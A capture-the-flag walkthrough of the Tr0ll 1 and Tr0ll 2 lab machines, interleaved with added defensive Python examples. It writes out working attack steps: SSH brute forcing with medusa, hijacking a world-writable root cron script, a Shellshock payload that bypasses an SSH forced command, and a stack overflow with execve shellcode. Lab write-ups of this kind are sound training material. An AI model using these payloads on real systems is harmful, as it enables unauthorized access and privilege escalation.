Tr0ll Write-Up

What follows is a write-up of two vulnerable machines, Tr0ll 1 and Tr0ll 2.

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs.

The goal is simple: gain root and get Proof.txt from the /root directory.

[*] STATUS: COMPLETED

Tr0ll 1 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
'''
Note the following ports and services are up and running:
ftp vsftpd 3.0.2
ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.4.7 ((Ubuntu))

'''

2) nikto -h 192.168.189.197
# It found a '/secret/' directory mentioned in robots.txt which might be interesting
3) Browse to: 192.168.189.197
# Got trolled. Nice one.
# Let's try attacking through ftp

4) ftp 192.168.189.197 -> anonymous:anonymous
# We’re in
5) ls -> get lol.pcap -> exit
6) strings lol.pcap
# Note: you almost found the sup3rs3cr3tdirlol 😛
7) Browse to: http://192.168.189.197/sup3rs3cr3tdirlol/
8) Download the binary
9) strings roflmao
# Note: Find address 0x0856BF to proceed
10) Browse to: http://192.168.189.197/0x0856BF/
11) Click on 'good_luck' -> which_one_lol.txt
12) wget http://192.168.189.197/0x0856BF/good_luck/which_one_lol.txt
13) Click on 'this_folder_contains_the_password/' -> Pass.txt
# Note: Either 'Pass.txt' or its contents 'Good_job_:)' could be the password
14) medusa -U which_one_lol.txt -p Pass.txt -h 192.168.189.197 -M ssh
# We found our way in
15) ssh overflow@192.168.189.197 -> Pass: Pass.txt
# We're in
16) cat /root/Proof.txt
# Permission denied, we're going to have to do privilege escalation
17) find / -perm -o+w
# Searching for world writable files
# That /lib/log/cleaner.py file near the end looks interesting
18) vi /lib/log/cleaner.py
Modify the command inside the try: block to:
os.system('usermod -aG sudo overflow')

# Initially the modification didn't seem to work, but by the third log on
# (it kept kicking us out) we finally became a sudoer
19) id
# Became a sudoer
20) sudo ls /root
21) sudo cat /root/proof.txt
# Got the flag

Flag: 702a8c18d29c6f3ca0d99ef5712bfbdc
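
The world-writable cleaner.py is the whole privilege escalation on this box: a script that root's cron job runs but that any user can edit. The Python below is added here as an editor's example and is not part of the original write-up or of the Tr0ll VM. It automates the `find / -perm -o+w` check from the defender's side and also flags the case the manual find misses, a read-only file sitting in a world-writable directory without the sticky bit (the file can be unlinked and replaced wholesale). It runs against a constructed temporary tree; the paths and modes in `demo()` are sample data, not taken from the box.

```python
import os
import stat
import tempfile


def audit_writable(root):
    """Return sorted (path, reason) pairs for regular files under `root` that an
    unprivileged local user could modify or replace.

    Reason 1 is the `find / -perm -o+w` case from the write-up.  Reason 2 covers
    a correctly permissioned file inside a world-writable directory that lacks
    the sticky bit: the file itself is read-only, but the directory entry is not,
    so it can be deleted and a new file dropped in under the same name."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        try:
            dmode = os.lstat(dirpath).st_mode
        except OSError:
            continue
        dir_replaceable = bool(dmode & stat.S_IWOTH) and not (dmode & stat.S_ISVTX)
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue
            if not stat.S_ISREG(mode):
                continue  # symlinks and specials are out of scope for this check
            if mode & stat.S_IWOTH:
                findings.append((path, "file is world-writable"))
            elif dir_replaceable:
                findings.append((path, "parent directory is world-writable without sticky bit"))
    return sorted(findings)


def demo():
    """Audit a constructed tree that mimics the Tr0ll 1 layout (sample data only).

    Returns {relative path: reason} so the result is easy to inspect."""
    with tempfile.TemporaryDirectory() as tmp:
        log = os.path.join(tmp, "lib", "log")
        spool = os.path.join(tmp, "spool")
        scratch = os.path.join(tmp, "tmp")
        for d in (log, spool, scratch):
            os.makedirs(d)
        files = {
            os.path.join(log, "cleaner.py"): 0o666,   # the bug: root's cron script, o+w
            os.path.join(log, "rotate.py"): 0o644,    # correctly permissioned sibling
            os.path.join(spool, "job.sh"): 0o644,     # fine itself, but its dir is 0777
            os.path.join(scratch, "note.txt"): 0o644, # /tmp-style 1777 dir is not flagged
        }
        for path, mode in files.items():
            with open(path, "w") as fh:
                fh.write("# constructed sample\n")
            os.chmod(path, mode)
        os.chmod(log, 0o755)
        os.chmod(spool, 0o777)
        os.chmod(scratch, 0o1777)
        return {os.path.relpath(p, tmp): why for p, why in audit_writable(tmp)}


if __name__ == "__main__":
    for rel, why in demo().items():
        print(f"{rel}: {why}")
```

Run `audit_writable('/')` as root on a real host and look first at anything under a path that cron, init scripts or sudo rules execute; `chmod o-w` is the immediate fix, and the owner of the file deserves a look as well.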

End-Notes:
Pretty funny box, though slightly annoying when it kept logging us out. Fun overall.


Tr0ll 2 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
'''
Note the following ports and services are up and running:
ftp vsftpd 2.0.8 or later
ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.2.22 ((Ubuntu))

Also notice that there were two network adapters. Perhaps some chaining?

'''

2) Browse to: 192.168.189.204
3) nikto -h 192.168.189.204
'''
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15.

'''

4) wfuzz --hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.189.204/FUZZ
# Fuzzing for directories: only index came up

5) Browse to: http://192.168.189.204/robots.txt

6) wfuzz --hc 404 -c -z file,/root/Documents/wargames/tr0ll/list.txt http://192.168.189.204/FUZZ

'''
Out of all the URLs only the following seem to work:
http://192.168.189.204/noob/
http://192.168.189.204/keep_trying/
http://192.168.189.204/dont_bother/
http://192.168.189.204/ok_this_is_it/

The filename of the images is: cat_the_troll
'''

7) Download all the images
8) tail -n 1 cat_the_troll.jpg cat_the_troll.jpg.1 cat_the_troll.jpg.2 cat_the_troll.jpg.3
# Notice on the third image (dont_bother) we get:
# Look Deep within y0ur_self for the answer

9) Browse to: http://192.168.189.204/y0ur_self/
10) wget http://192.168.189.204/y0ur_self/answer.txt
11) cat answer.txt | base64 -d > the_answer.txt
12) gedit the_answer.txt
# It’s a bunch of repeated words
13) uniq -u the_answer.txt > answerz.txt
14) gedit answerz.txt
# Notice the following string: ItCantReallyBeThisEasyRightLOL
# After trying it on the web app, ftp, and ssh, I decided to move on
15) ftp 192.168.189.204 -> Tr0ll:Tr0ll
# It was this easy
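
The decode-then-`uniq -u` pipeline above works because uniq only collapses adjacent duplicates, which is exactly why the filler words disappear and the one-off string survives. The Python below is an added example, not anything from the original post: it reproduces the pipeline on a constructed base64 blob and contrasts `uniq -u` with a whole-file count so the difference is explicit. The sample words are made up and are not the contents of answer.txt.

```python
import base64
from collections import Counter
from itertools import groupby

# Constructed stand-in for answer.txt: filler words repeated on consecutive
# lines and one candidate that appears only once.  Sample data, not the file
# from the box.
_SAMPLE_WORDS = (
    ["password"] * 3
    + ["letmein"] * 2
    + ["ItCantReallyBeThisEasyRightLOL"]
    + ["qwerty"] * 4
    + ["password"] * 2
)
SAMPLE_ANSWER_TXT = base64.b64encode("\n".join(_SAMPLE_WORDS).encode())


def decode_wordlist(blob):
    """The `base64 -d` step: turn the downloaded file into a list of lines."""
    return base64.b64decode(blob).decode("utf-8").splitlines()


def uniq_u(lines):
    """Reproduce `uniq -u`: emit a line only when its run of *adjacent* identical
    lines has length 1.  uniq never sorts, so the same word appearing in two
    separate runs is printed twice; compare globally_unique() below."""
    return [line for line, run in groupby(lines) if len(list(run)) == 1]


def globally_unique(lines):
    """Lines occurring exactly once in the whole file, i.e. `sort | uniq -u`
    semantics, which is what people often assume plain `uniq -u` does."""
    counts = Counter(lines)
    return [line for line in lines if counts[line] == 1]


def candidates(blob):
    """Full pipeline from the write-up: decode, then keep non-repeated lines."""
    return uniq_u(decode_wordlist(blob))


if __name__ == "__main__":
    print(candidates(SAMPLE_ANSWER_TXT))
```

On a wordlist where the filler is not grouped, `uniq -u` on its own would leave most of it in place; sorting first (or using the whole-file count) is the more robust filter.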

16) ls -> get lmao.zip -> exit
17) unzip lmao.zip
# It’s password encrypted
# The password is: ItCantReallyBeThisEasyRightLOL

18) file noob
# noob: PEM RSA private key
# This might very well be to log in via ssh

19) ssh noob@192.168.189.204 -i noob
# It prints out “TRY HARDER LOL!” and closes the connection
# Looks like it’s forcing this command (echo) to be run once we log in

20) Search for ‘ssh exploit’
21) Read: http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
# We can use the shellshock exploit to run other commands

22) ssh noob@192.168.189.204 -i noob '() { :;}; /bin/bash'
23) id
# We’re in
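
The forced-command bypass above is Shellshock: sshd places the client's requested command in the SSH_ORIGINAL_COMMAND environment variable, and an unpatched bash starting up as the account's login shell imports any environment value that begins with `() {` as a function definition and then executes whatever follows the closing brace. The Python below is an added detection example written for this write-up, not code from the original post; it matches that pattern in environment values and extracts the trailing command for triage. The sample environment is constructed, and the regex is an assumption that deliberately accepts looser spacing than bash's literal prefix check.

```python
import re

# Unpatched bash treated an environment value starting with the literal "() {"
# as a function definition and kept parsing past the closing brace, so trailing
# text ran.  The matcher is looser than bash's own check on purpose, so spacing
# variants seen in probes are also caught.
_FUNC_DEF = re.compile(r"^\s*\(\s*\)\s*\{")


def is_shellshock(value: str) -> bool:
    """True when `value` looks like an exported bash function definition."""
    return bool(_FUNC_DEF.match(value))


def trailing_command(value: str):
    """Text after the function body's closing brace, i.e. what an unpatched bash
    would have executed.  None for non-matching values, '' when the body is
    never closed."""
    m = _FUNC_DEF.match(value)
    if not m:
        return None
    depth = 0
    for i in range(m.end() - 1, len(value)):  # m.end()-1 is the opening brace
        ch = value[i]
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return value[i + 1:].lstrip("; \t")
    return ""


def scan_environment(env):
    """Return sorted (variable, trailing command) pairs for suspicious values."""
    return sorted(
        (name, trailing_command(value))
        for name, value in env.items()
        if is_shellshock(value)
    )


# Constructed sample environment (not captured from the box): one variable
# carries the exact string from the write-up, one a CGI-style probe, two are
# benign values that must not fire.
SAMPLE_ENV = {
    "SSH_ORIGINAL_COMMAND": "() { :;}; /bin/bash",
    "HTTP_USER_AGENT": "() { :; }; echo vulnerable",
    "TERM": "xterm-256color",
    "SHELL": "/bin/bash",
}

if __name__ == "__main__":
    for name, cmd in scan_environment(SAMPLE_ENV):
        print(f"{name}: would have run {cmd!r}")
```

The fix is a patched bash; a forced command in authorized_keys gives no protection while the account's login shell is a vulnerable bash, because the forced command itself is launched through that shell. The same scanner can be pointed at CGI request environments or web access logs, where the User-Agent variant was the common delivery.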
24) pwd -> cd ../ -> ls -> ls tr0ll
# There’s a lmao.zip
25) cd / -> ls -> ls nothing_to_see_here -> ls nothing_to_see_here/choose_wisely
26) cd nothing_to_see_here/choose_wisely
27) ls door1 -> ls door2 -> ls door3
28) file door1/r00t -> file door2/r00t -> file door3/r00t
'''
After running all three files, we get the following:
- door1 r00t lets us input data
- door2 prints:
Good job, stand by, executing root shell…
BUHAHAHA NOOB!

- door3 r00t prints: 2 MINUTE HARD MODE LOL, and then bricks the system

Let's go with door1. Binary exploitation?
'''

29) cd door1
30) gdb -q ./r00t
31) run $(python -c 'print "A" * 500')
# We get a segmentation fault
32) run $(python -c 'print "A" * 300')
33) run $(python -c 'print "A" * 200')
34) run $(python -c 'print "A" * 250')
35) run $(python -c 'print "A" * 270')
36) run $(python -c 'print "A" * 268 + "B" * 4')
# We control EIP

37) disas main
38) br *main+97
# Setting a breakpoint at leave
39) run $(python -c 'print "A" * 268 + "B" * 4')
40) x/100x $esp
'''
Notice where our A's start
We can now load and run our shellcode

Let's use the execve /bin/sh shellcode I wrote, which is 25 bytes in size
'''

41) run $(python -c 'print "A" * 268 + "\x80\xfb\xff\xbf" + "\x90" * 20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')
# Confirming it works

42) ./r00t $(python -c 'print "A" * 268 + "\x80\xfb\xff\xbf" + "\x90" * 20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')

43) whoami
44) cat /root/Proof.txt
# Got the flag

Flag: a70354f0258dcc00292c72aab3c8b1e4

End-Notes:
Fun box!
